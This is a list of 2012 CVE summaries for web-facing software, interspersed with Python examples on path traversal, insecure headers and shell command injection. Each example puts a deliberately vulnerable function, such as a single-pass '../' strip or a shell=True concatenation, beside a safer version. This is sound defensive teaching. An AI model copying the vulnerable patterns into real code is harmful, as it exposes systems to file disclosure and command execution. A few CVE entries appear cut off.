[CVE-2012-2072] Cross-site scripting (XSS) vulnerability in the Share Buttons (AddToAny) module 6.x-3.x before 6.x-3.4 for Drupal allows remote authenticated users with the administer addtoany permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2071] Cross-site scripting (XSS) vulnerability in the Contact Forms module 6.x-1.x before 6.x-1.13 for Drupal when the core contact form is enabled, allows remote authenticated users with the administer site-wide contact form permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2070] Cross-site scripting (XSS) vulnerability in the MultiBlock module 6.x-1.x before 6.x-1.4 and 7.x-1.x before 7.x-1.1 for Drupal allows remote authenticated users with the administer blocks permission to inject arbitrary web script or HTML via the block title.
[CVE-2012-2068] Multiple cross-site scripting (XSS) vulnerabilities in fancy_slide.module in the Fancy Slide module before 6.x-2.7 for Drupal allow remote authenticated users with the administer fancy_slide permission to inject arbitrary web script or HTML via the (1) node_title or (2) nodequeue_title parameter.
[CVE-2012-2066] Cross-site scripting (XSS) vulnerability in the FCKeditor module 6.x-2.x before 6.x-2.3 and the CKEditor module 6.x-1.x before 6.x-1.9 and 7.x-1.x before 7.x-1.7 for Drupal allows remote authenticated users or remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2065] Cross-site scripting (XSS) vulnerability in the Language Icons module 6.x-2.x before 6.x-2.1 and 7.x-1.x before 7.x-1.0 for Drupal allows remote authenticated users with administer languages permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2064] Cross-site scripting (XSS) vulnerability in theme/views_lang_switch.theme.inc in the Views Language Switcher module before 7.x-1.2 for Drupal allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2012-2062] Open redirect vulnerability in the Redirecting click bouncer module for Drupal allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-2060] Cross-site scripting (XSS) vulnerability in the Admin tools module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2059] Cross-site scripting (XSS) vulnerability in the ticketyboo News Ticker module for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2022] Multiple cross-site scripting (XSS) vulnerabilities in HP Network Node Manager i (NNMi) 8.x, 9.0x, 9.1x, and 9.20 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2021] Multiple cross-site scripting (XSS) vulnerabilities in HP AssetManager 5.20, 5.21, 5.22, and 9.30 allow remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2018] Cross-site scripting (XSS) vulnerability in HP Network Node Manager i (NNMi) 8.x, 9.0x, and 9.1x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2011] Multiple cross-site scripting (XSS) vulnerabilities in HP Web Jetadmin 8.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2008] Cross-site scripting (XSS) vulnerability in HP Performance Insight for Networks 5.3.x, 5.41, 5.41.001, and 5.41.002 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2005] Cross-site scripting (XSS) vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-2004] Open redirect vulnerability in HP Insight Management Agents before 9.0.0.0 on Windows Server 2003 and 2008 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-2002] Open redirect vulnerability in HP SNMP Agents for Linux before 9.0.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
[CVE-2012-2001] Cross-site scripting (XSS) vulnerability in HP SNMP Agents for Linux before 9.0.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1992] Cross-site scripting (XSS) vulnerability in admin/edituser.php in CMS Made Simple 1.10.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter (aka the Email Address field in the Edit User template).
[CVE-2012-1990] Multiple cross-site scripting (XSS) vulnerabilities in Schneider Electric Kerweb before 3.0.1 and Kerwin before 6.0.1 allow remote attackers to inject arbitrary web script or HTML via (1) the evtvariablename parameter in an evts.xml action to kw.dll, (2) unspecified search fields, or (3) unspecified content-display fields.
[CVE-2012-1984] Multiple cross-site scripting (XSS) vulnerabilities in RealNetworks Helix Server and Helix Mobile Server 14.x before 14.3.x allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1982] Cross-site scripting (XSS) vulnerability in my_admin/admin1_list_pages.php in SocialCMS 1.0.2 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the TR_title parameter in an edit action.
[CVE-2012-1979] Cross-site scripting (XSS) vulnerability in starnet/index.php in SyndeoCMS 3.0.01 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the email parameter (aka Email address field) in an edit_user configuration action.
[CVE-2012-1963] The Content Security Policy (CSP) functionality in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 does not properly restrict the strings placed into the blocked-uri parameter of a violation report, which allows remote web servers to capture OpenID credentials and OAuth 2.0 access tokens by triggering a violation.
[CVE-2012-1961] Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 do not properly handle duplicate values in X-Frame-Options headers, which makes it easier for remote attackers to conduct clickjacking attacks via a FRAME element referencing a web site that produces these duplicate values.
[CVE-2012-1953] The ElementAnimations::EnsureStyleRuleFor function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 allows remote attackers to cause a denial of service (buffer over-read, incorrect pointer dereference, and heap-based buffer overflow) or possibly execute arbitrary code via a crafted web site.
[CVE-2012-1952] The nsTableFrame::InsertFrames function in Mozilla Firefox 4.x through 13.0, Firefox ESR 10.x before 10.0.6, Thunderbird 5.0 through 13.0, Thunderbird ESR 10.x before 10.0.6, and SeaMonkey before 2.11 does not properly perform a cast of a frame variable during processing of mixed row-group and column-group frames, which might allow remote attackers to execute arbitrary code via a crafted web site.
[CVE-2012-1935] Multiple cross-site scripting (XSS) vulnerabilities in Newscoop 3.5.x before 3.5.5 and 4.x before 4 RC4 allow remote attackers to inject arbitrary web script or HTML via the (1) Back parameter to admin/ad.php, or the (2) token or (3) f_email parameter to admin/password_check_token.php.
[CVE-2012-1920] @Mail WebMail Client in AtMail Open-Source 1.04 and earlier allows remote attackers to obtain configuration information via a direct request to install/info.php, which calls the phpinfo function.
[CVE-2012-1919] CRLF injection vulnerability in mime.php in @Mail WebMail Client in AtMail Open-Source before 1.05 allows remote attackers to conduct directory traversal attacks and read arbitrary files via a %0A sequence followed by a .. (dot dot) in the file parameter.
[CVE-2012-1918] Multiple directory traversal vulnerabilities in (1) compose.php and (2) libs/Atmail/SendMsg.php in @Mail WebMail Client in AtMail Open-Source before 1.05 allow remote attackers to read arbitrary files via a .. (dot dot) in the Attachment[] parameter.
[CVE-2012-1917] compose.php in @Mail WebMail Client in AtMail Open-Source before 1.05 does not properly handle ../ (dot dot slash) sequences in the unique parameter, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a ..././ (dot dot dot slash dot slash) sequence.
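The three AtMail traversal entries above (CVE-2012-1917, CVE-2012-1918, CVE-2012-1919) are one failure seen from three sides: a filter that removes "../" in a single pass, so "..././" collapses back into "../"; a %0A newline that slips past a check; and an attachment name joined onto a directory with no check at all. The Python below is an added example, not AtMail code: it shows the single-pass strip and the path it produces, beside a replacement check that decodes once, refuses control characters, normalizes the joined path and only then tests that the result is still under the base directory. BASE_DIR and the function names are assumptions for the example.

```python
import posixpath
import urllib.parse
from typing import Optional

BASE_DIR = "/var/www/atmail/tmp"   # assumed upload directory for the example


def naive_strip(name: str) -> str:
    """Single-pass removal of '../': the filter that '..././' defeats,
    because removing the inner '../' leaves a fresh '../' behind."""
    return name.replace("../", "")


def vulnerable_path(name: str) -> str:
    """Filter first, join second, never re-check: the CVE-2012-1917 pattern."""
    return posixpath.normpath(posixpath.join(BASE_DIR, naive_strip(name)))


def safe_path(name: str) -> Optional[str]:
    """Decode once, reject control characters (CVE-2012-1919's %0A among them),
    normalize the joined path, and only then test containment on the result."""
    decoded = urllib.parse.unquote(name)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return None
    base = posixpath.normpath(BASE_DIR)
    # posixpath.join discards the base when `decoded` is absolute, so an
    # absolute-path attempt also ends up outside `base` and is rejected below.
    candidate = posixpath.normpath(posixpath.join(base, decoded))
    # Containment is decided on the normalized result, not on the raw input,
    # so no amount of '..././' or percent-encoding changes the answer.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate
```

Double-encoded input ("%252e") decodes once to a literal "%2e", which normpath keeps as an ordinary name, so containment still holds; the check never tries to recognize bad sequences, it only tests where the final path ends up. Symlinks under BASE_DIR are out of scope here; a deployment would compare os.path.realpath() of the candidate against os.path.realpath() of the base.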
[CVE-2012-1916] @Mail WebMail Client in AtMail Open-Source before 1.05 allows remote attackers to execute arbitrary code via an e-mail attachment with an executable extension, leading to the creation of an executable file under tmp/.
[CVE-2012-1912] Cross-site scripting (XSS) vulnerability in preferences.php in PHP Address Book 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the from parameter. NOTE: the index.php vector is already covered by CVE-2008-2566.
[CVE-2012-1908] Cross-site scripting (XSS) vulnerability in Splunk 4.0 through 4.3 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2012-1900] Cross-site request forgery (CSRF) vulnerability in admin/index.php in RazorCMS 1.2.1 and earlier allows remote attackers to hijack the authentication of administrators for requests that delete arbitrary web pages via a showcats action.
[CVE-2012-1899] Multiple cross-site scripting (XSS) vulnerabilities in webfolio/admin/users/edit in Webfolio CMS 1.1.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) First name, (2) Last name or (3) Email (required) fields.
[CVE-2012-1898] Multiple cross-site scripting (XSS) vulnerabilities in wolfcms/admin/user/add in Wolf CMS 0.75 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user[name], (2) user[email], or (3) user[username] parameters.
[CVE-2012-1892] Cross-site scripting (XSS) vulnerability in Microsoft Visual Studio Team Foundation Server 2010 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "XSS Vulnerability."
[CVE-2012-1889] Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 accesses uninitialized memory locations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.
[CVE-2012-1882] Microsoft Internet Explorer 6 through 9 does not block cross-domain scrolling events, which allows remote attackers to read content from a different (1) domain or (2) zone via a crafted web site, aka "Scrolling Events Information Disclosure Vulnerability."
[CVE-2012-1872] Cross-site scripting (XSS) vulnerability in Microsoft Internet Explorer 6 through 9 allows remote attackers to inject arbitrary web script or HTML via crafted character sequences with EUC-JP encoding, aka "EUC-JP Character Encoding Vulnerability."
[CVE-2012-1870] The CBC mode in the TLS protocol, as used in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, and other products, allows remote web servers to obtain plaintext data by triggering multiple requests to a third-party HTTPS server and sniffing the network during the resulting HTTPS session, aka "TLS Protocol Vulnerability."
[CVE-2012-1863] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Reflected List Parameter Vulnerability."
[CVE-2012-1862] Open redirect vulnerability in Microsoft Office SharePoint Server 2007 SP2 and SP3 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a crafted URL, aka "SharePoint URL Redirection Vulnerability."
[CVE-2012-1861] Cross-site scripting (XSS) vulnerability in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "SharePoint Script in Username Vulnerability."
[CVE-2012-1860] Microsoft Office SharePoint Server 2007 SP2 and SP3, SharePoint Server 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 do not properly check permissions for search scopes, which allows remote authenticated users to obtain sensitive information or cause a denial of service (data modification) by changing a parameter in a search-scope URL, aka "SharePoint Search Scope Vulnerability."
[CVE-2012-1859] Cross-site scripting (XSS) vulnerability in scriptresx.ashx in Microsoft SharePoint Server 2010 Gold and SP1, SharePoint Foundation 2010 Gold and SP1, and Office Web Apps 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via crafted JavaScript elements in a URL, aka "XSS scriptresx.ashx Vulnerability."
[CVE-2012-1857] Cross-site scripting (XSS) vulnerability in the Enterprise Portal component in Microsoft Dynamics AX 2012 allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka "Dynamics AX Enterprise Portal XSS Vulnerability."
[CVE-2012-1856] The TabStrip ActiveX control in the Common Controls in MSCOMCTL.OCX in Microsoft Office 2003 SP3, Office 2003 Web Components SP3, Office 2007 SP2 and SP3, Office 2010 SP1, SQL Server 2000 SP4, SQL Server 2005 SP4, SQL Server 2008 SP2, SP3, R2, R2 SP1, and R2 SP2, Commerce Server 2002 SP4, Commerce Server 2007 SP2, Commerce Server 2009 Gold and R2, Host Integration Server 2004 SP1, Visual FoxPro 8.0 SP1, Visual FoxPro 9.0 SP2, and Visual Basic 6.0 Runtime allows remote attackers to execute arbitrary code via a crafted (1) document or (2) web page that triggers system-state corruption, aka "MSCOMCTL.OCX RCE Vulnerability."
[CVE-2012-1842] Cross-site scripting (XSS) vulnerability in checkQKMProg.htm on the Quantum Scalar i500 tape library with firmware before i7.0.3 (604G.GS00100), also distributed as the Dell ML6000 tape library with firmware before A20-00 (590G.GS00100), allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1837] The (1) webreports, (2) post/create-role, and (3) post/update-role programs in IBM Tivoli Endpoint Manager (TEM) before 8.2 do not include the HTTPOnly flag in a Set-Cookie header for a cookie, which makes it easier for remote attackers to obtain potentially sensitive information via script access to this cookie.
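CVE-2012-1961 above and CVE-2012-1837 here both come down to how a consumer reads repeated or under-specified response headers: two X-Frame-Options copies that disagree, and a Set-Cookie without HttpOnly. The Python below is an added example, not code from Mozilla or IBM: it parses a raw response header block, reports which cookies lack HttpOnly or Secure, and reduces every X-Frame-Options value it finds (separate headers, or comma-joined by an intermediary) to one effective policy, treating disagreement as DENY. The sample response is constructed for the example, and DENY-on-conflict is the example's own conservative rule, not a claim about what any particular browser does.

```python
from typing import Dict, List, Tuple

# Constructed sample response for the example; not captured from any real host.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: JSESSIONID=abc123; Path=/\r\n"
    "Set-Cookie: csrftoken=xyz; Path=/; HttpOnly; Secure\r\n"
    "X-Frame-Options: DENY\r\n"
    "X-Frame-Options: ALLOW-FROM https://example.test\r\n"
    "\r\n"
    "<html></html>"
)

Header = Tuple[str, str]


def parse_headers(raw: str) -> List[Header]:
    """Split a raw response into (lowercased name, value) pairs, keeping every
    occurrence: Set-Cookie is legitimately repeated and X-Frame-Options may be."""
    head = raw.split("\r\n\r\n", 1)[0]
    pairs: List[Header] = []
    for line in head.split("\r\n")[1:]:      # [1:] drops the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        pairs.append((name.strip().lower(), value.strip()))
    return pairs


def audit_cookies(headers: List[Header]) -> Dict[str, List[str]]:
    """Map each cookie name to the attributes it is missing (the CVE-2012-1837 class)."""
    findings: Dict[str, List[str]] = {}
    for name, value in headers:
        if name != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        cookie_name = parts[0].split("=", 1)[0]
        present = {p.split("=", 1)[0].lower() for p in parts[1:]}
        findings[cookie_name] = [a for a in ("HttpOnly", "Secure") if a.lower() not in present]
    return findings


def effective_frame_policy(headers: List[Header]) -> Tuple[str, List[str]]:
    """Gather every X-Frame-Options value and reduce it to one policy. Any
    disagreement yields DENY, so a second copy that differs from the first can
    only tighten the result, never loosen it (the CVE-2012-1961 failure mode)."""
    values: List[str] = []
    for name, value in headers:
        if name == "x-frame-options":
            values.extend(v.strip() for v in value.split(",") if v.strip())
    if not values:
        return ("NONE", values)
    if len({v.upper() for v in values}) == 1:
        return (values[0].upper(), values)
    return ("DENY", values)
```

The cookie audit reports on the header as sent; a cookie that is never returned over HTTPS does not benefit from Secure, and a cookie that legitimately needs script access cannot carry HttpOnly, so the findings are a review list rather than a verdict.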
[CVE-2012-1835] Multiple cross-site scripting (XSS) vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php
[CVE-2012-1829] Multiple cross-site scripting (XSS) vulnerabilities in AutoFORM PDM Archive before 6.920 allow remote authenticated users to inject arbitrary web script or HTML via unspecified fields.
[CVE-2012-1827] The web service in AutoFORM PDM Archive before 7.1 does not have authorization requirements, which allows remote authenticated users to perform database operations via a SOAP request, as demonstrated by the initializeQueryDatabase2 request.
[CVE-2012-1825] Multiple cross-site scripting (XSS) vulnerabilities in the status program on the ForeScout CounterACT appliance with software 6.3.3.2 through 6.3.4.10 allow remote attackers to inject arbitrary web script or HTML via (1) the loginname parameter in a forgotpass action or (2) the username parameter.
[CVE-2012-1821] The Network Threat Protection module in the Manager component in Symantec Endpoint Protection (SEP) 11.0.600x through 11.0.700x on Windows Server 2003 allows remote attackers to cause a denial of service (web-server outage, or daemon crash or hang) via a flood of packets that triggers automated blocking of network traffic.
[CVE-2012-1814] Cross-site scripting (XSS) vulnerability in Emerson DeltaV and DeltaV Workstations 9.3.1, 10.3.1, 11.3, and 11.3.1 and DeltaV ProEssentials Scientific Graph 5.0.0.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1809] The web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 allows remote attackers to cause a denial of service (resource consumption) via unspecified vectors.
[CVE-2012-1808] The web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 does not require authentication, which allows remote attackers to perform unspecified functions via unknown vectors.
[CVE-2012-1807] Cross-site scripting (XSS) vulnerability in the web server in the ECOM Ethernet module in Koyo H0-ECOM, H0-ECOM100, H2-ECOM, H2-ECOM-F, H2-ECOM100, H4-ECOM, H4-ECOM-F, and H4-ECOM100 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1802] Buffer overflow in the embedded web server on the Siemens Scalance X Industrial Ethernet switch X414-3E before 3.7.1, X308-2M before 3.7.2, X-300EEC before 3.7.2, XR-300 before 3.7.2, and X-300 before 3.7.2 allows remote attackers to cause a denial of service (device reboot) or possibly execute arbitrary code via a malformed URL.
[CVE-2012-1801] Multiple stack-based buffer overflows in (1) COM and (2) ActiveX controls in ABB WebWare Server, WebWare SDK, Interlink Module, S4 OPC Server, QuickTeach, RobotStudio S4, and RobotStudio Lite allow remote attackers to execute arbitrary code via crafted input data.
[CVE-2012-1799] The web server on the Siemens Scalance S Security Module firewall S602 V2, S612 V2, and S613 V2 with firmware before 2.3.0.3 does not limit the rate of authentication attempts, which makes it easier for remote attackers to obtain access via a brute-force attack on the administrative password.
[CVE-2012-1795] webglimpse.cgi in Webglimpse before 2.20.0 allows remote attackers to execute arbitrary commands via shell metacharacters in the query parameter, as exploited in the wild in March 2012.
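CVE-2012-1795 is shell-metacharacter command injection in a CGI: the query parameter is spliced into a command string and handed to the shell. The Python below is an added example, not Webglimpse code: the search binary is stood in by a small Python one-liner that echoes its arguments, so the block runs anywhere Python does, and the same query is passed first through string concatenation under sh -c and then as one element of an argv list. STAND_IN and the function names are assumptions for the example.

```python
import shlex
import subprocess
import sys

# Stand-in for the search binary, constructed for the example: prints each
# argument it receives on its own line, so the output shows what the
# program actually saw.
STAND_IN = [sys.executable, "-c", "import sys; print('\\n'.join(sys.argv[1:]))"]


def build_shell_command(query: str) -> str:
    """The injectable pattern: a command string built by concatenation and
    later handed to sh -c. The binary's own arguments are quoted; the query
    is not, so ';', '|', '`' and '$()' inside it are parsed by the shell."""
    return " ".join(shlex.quote(arg) for arg in STAND_IN) + " " + query


def run_vulnerable(query: str) -> str:
    """Runs the concatenated string through the shell (the CVE-2012-1795 shape)."""
    result = subprocess.run(build_shell_command(query), shell=True,
                            capture_output=True, text=True)
    return result.stdout


def run_safe(query: str) -> str:
    """Passes the query as one argv element with no shell involved: the same
    metacharacters arrive at the program as plain characters."""
    result = subprocess.run(STAND_IN + [query], capture_output=True, text=True)
    return result.stdout
```

An argv list removes the shell from the path entirely, which is the fix for this class; it does not by itself stop a query beginning with "-" from being read as an option by the real binary, so the CGI still has to validate the term or terminate option parsing before it.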
[CVE-2012-1792] Cross-site scripting (XSS) vulnerability in osCommerce/OM/Core/Site/Setup/Application/Install/RPC/DBCheck.php in OSCommerce Online Merchant 3.0.2, when the software is being installed, allows remote attackers to inject arbitrary web script or HTML via the name parameter to oscommerce/index.php, which is not properly handled in an error message. NOTE: this might not be a vulnerability, since the ability to access oscommerce/index.php during installation may already imply administrator privileges.
[CVE-2012-1790] Absolute path traversal vulnerability in Webgrind 1.0 and 1.0.2 allows remote attackers to read arbitrary files via a full pathname in the file parameter to index.php.
[CVE-2012-1789] Multiple cross-site scripting (XSS) vulnerabilities in Kongreg8 1.7.3 allow remote attackers to inject arbitrary web script or HTML via the (1) surname or (2) firstname parameters to modules/members/addmember.php.
[CVE-2012-1788] Multiple cross-site scripting (XSS) vulnerabilities in wonderdesk.cgi in WonderDesk SQL 4.14 allow remote attackers to inject arbitrary web script or HTML via the (1) cus_email parameter in a cust_lostpw action
[CVE-2012-1787] Multiple cross-site scripting (XSS) vulnerabilities in wgarcmin.cgi in Webglimpse 2.20.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) URL, (2) FILE, or (3) DOMAIN parameters.
[CVE-2012-1782] Multiple cross-site scripting (XSS) vulnerabilities in questions/ask in OSQA 3b allow remote attackers to inject arbitrary web script or HTML via the (1) url bar or (2) picture bar.
[CVE-2012-1781] Multiple cross-site scripting (XSS) vulnerabilities in ajax/commentajax.php in SocialCMS 1.0.5 allow remote attackers to inject arbitrary web script or HTML via the (1) TREF_email_address or (2) TR_name parameters.
[CVE-2012-1779] Cross-site scripting (XSS) vulnerability in IDevSpot idev-BusinessDirectory 3.0 allows remote attackers to inject arbitrary web script or HTML via the SEARCH parameter to index.php.
[CVE-2012-1738] Unspecified vulnerability in the Oracle iPlanet Web Server component in Oracle Sun Products Suite Java System Web Server 6.1 and Oracle iPlanet Web Server 7.0 allows remote attackers to affect availability via unknown vectors related to Web Server.
[CVE-2012-1731] Unspecified vulnerability in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Web UI.
[CVE-2012-1712] Directory traversal vulnerability in the Liferay component in Oracle Sun GlassFish Web Space Server before 10.0 Update 7 Patch 2 has unknown impact and attack vectors.
[CVE-2012-1710] Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer.
[CVE-2012-1709] Unspecified vulnerability in the Oracle WebCenter Forms Recognition component in Oracle Fusion Middleware 10.1.3.5 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Designer.
[CVE-2012-1701] Unspecified vulnerability in the Siebel CRM component in Oracle Siebel CRM 8.1.1 and 8.2.2 allows remote attackers to affect confidentiality via unknown vectors related to Highly Interactive Web UI.
[CVE-2012-1674] Unspecified vulnerability in the Siebel Clinical component in Oracle Industry Applications 7.7, 7.8, 8.0.0.x, 8.1.1.x, and 8.2.2.x allows remote authenticated users to affect integrity via unknown vectors related to Web UI.
[CVE-2012-1660] Multiple cross-site scripting (XSS) vulnerabilities in components/select.inc in the Webform module 6.x-3.x before 6.x-3.17 and 7.x-3.x before 7.x-3.17 for Drupal, when the "Select (or other)" module is enabled, allow remote authenticated users with the create webform content permission to inject arbitrary web script or HTML via vectors related to (1) checkboxes or (2) radios.
[CVE-2012-1659] Cross-site scripting (XSS) vulnerability in the Node Recommendation module 6.x-1.x before 6.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1658] Cross-site scripting (XSS) vulnerability in the Read More Link module 6.x-3.x before 6.x-3.1 for Drupal allows remote authenticated users with the access administration pages permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1657] Cross-site scripting (XSS) vulnerability in block_class.module in the Block Class module before 7.x-1.1 for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via the class name.
[CVE-2012-1654] Multiple cross-site scripting (XSS) vulnerabilities in the Data module 6.x-1.x before 6.x-1.0 and 7.x-1.x before 7.x-1.0-alpha3 for Drupal allow remote authenticated users with the administer data tables permission to inject arbitrary web script or HTML via the title parameter in (1) data.views.inc and (2) data_ui/data_ui.admin.inc.
[CVE-2012-1653] Cross-site scripting (XSS) vulnerability in the Taxonomy Views Integrator (TVI) module 6.x-1.x before 6.x-1.3 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors, related to "views pages."
[CVE-2012-1652] Cross-site scripting (XSS) vulnerability in the Hierarchical Select module 6.x-3.x before 6.x-3.8 for Drupal allows remote authenticated users with administer taxonomy permissions to inject arbitrary web script or HTML via unspecified vectors related to "the vocabulary's help text."
[CVE-2012-1651] Cross-site scripting (XSS) vulnerability in the Submenu Tree module before 6.x-1.5 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1648] Cross-site scripting (XSS) vulnerability in the Cool Aid module before 6.x-1.9 for Drupal allows remote authenticated users with the administer coolaid permission to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1647] Multiple cross-site scripting (XSS) vulnerabilities in the "stand alone PHP application for the OSM Player," as used in the MediaFront module 6.x-1.x before 6.x-1.5 and 7.x-1.x before 7.x-1.5 for Drupal, allow remote attackers to inject arbitrary web script or HTML via (1) $_SERVER['HTTP_HOST'] or (2) $_SERVER['SCRIPT_NAME'] to players/osmplayer/player/OSMPlayer.php, (3) playlist parameter to players/osmplayer/player/getplaylist.php, and possibly other vectors related to $_SESSION.
[CVE-2012-1646] Multiple cross-site scripting (XSS) vulnerabilities in the FAQ module 6.x-1.x before 6.x-1.13 and 7.x-1.x-rc1 for Drupal allow remote authenticated users to inject arbitrary web script or HTML via the (1) title parameter in faq.admin.inc or (2) detailed_question parameter in faq.module.
[CVE-2012-1640] Multiple cross-site scripting (XSS) vulnerabilities in the Managesite module 6.x-1.x before 6.1-1.1 for Drupal allow remote authenticated users with "administer managesite" permissions to inject arbitrary web script or HTML via the title parameter when (1) adding or (2) updating a category.
[CVE-2012-1639] Multiple cross-site scripting (XSS) vulnerabilities in product/commerce_product.module in the Drupal Commerce module for Drupal before 7.x-1.2 allow remote authenticated users to inject arbitrary web script or HTML via the (1) sku or (2) title parameters.
[CVE-2012-1634] Cross-site scripting (XSS) vulnerability in video_filter.codecs.inc in the Video Filter module 6.x-2.x and 7.x-2.x for Drupal allows remote attackers to inject arbitrary web script or HTML via the EMBEDLOOKUP parameter for Blip.tv links.
[CVE-2012-1632] Cross-site scripting (XSS) vulnerability in password_policy.admin.inc in the Password Policy module before 6.x-1.4 and 7.x-1.0 beta3 for Drupal allows remote authenticated users with administer policies permissions to inject arbitrary web script or HTML via the name parameter.
[CVE-2012-1630] Cross-site scripting (XSS) vulnerability in the Taxonomy Navigator module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1629] Cross-site scripting (XSS) vulnerability in the Taxotouch module for Drupal allows remote authenticated users with certain permissions to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1628] Cross-site scripting (XSS) vulnerability in the SuperCron module for Drupal allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1627] Cross-site scripting (XSS) vulnerability in vud_term.module in the Vote Up/Down module 6.x-2.x before 6.x-2.8 and 6.x-3.x before 6.x-3.1 for Drupal allows remote authenticated users to inject arbitrary web script or HTML via taxonomy terms.
[CVE-2012-1624] Multiple cross-site scripting (XSS) vulnerabilities in the Lingotek module 6.x-1.x before 6.x-1.40 for Drupal allow remote authenticated users to inject arbitrary web script or HTML when (1) creating or (2) editing page content.
[CVE-2012-1613] Cross-site scripting (XSS) vulnerability in edit_one_pic.php in Coppermine Photo Gallery before 1.5.20 allows remote authenticated users with certain privileges to inject arbitrary web script or HTML via the keywords parameter.
[CVE-2012-1612] Cross-site scripting (XSS) vulnerability in the update manager in Joomla! 2.5.x before 2.5.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2012-1608] The t3lib_div::RemoveXSS API method in TYPO3 4.4.0 through 4.4.13, 4.5.0 through 4.5.13, 4.6.0 through 4.6.6, 4.7, and 6.0 allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and inject arbitrary web script or HTML via non printable characters.
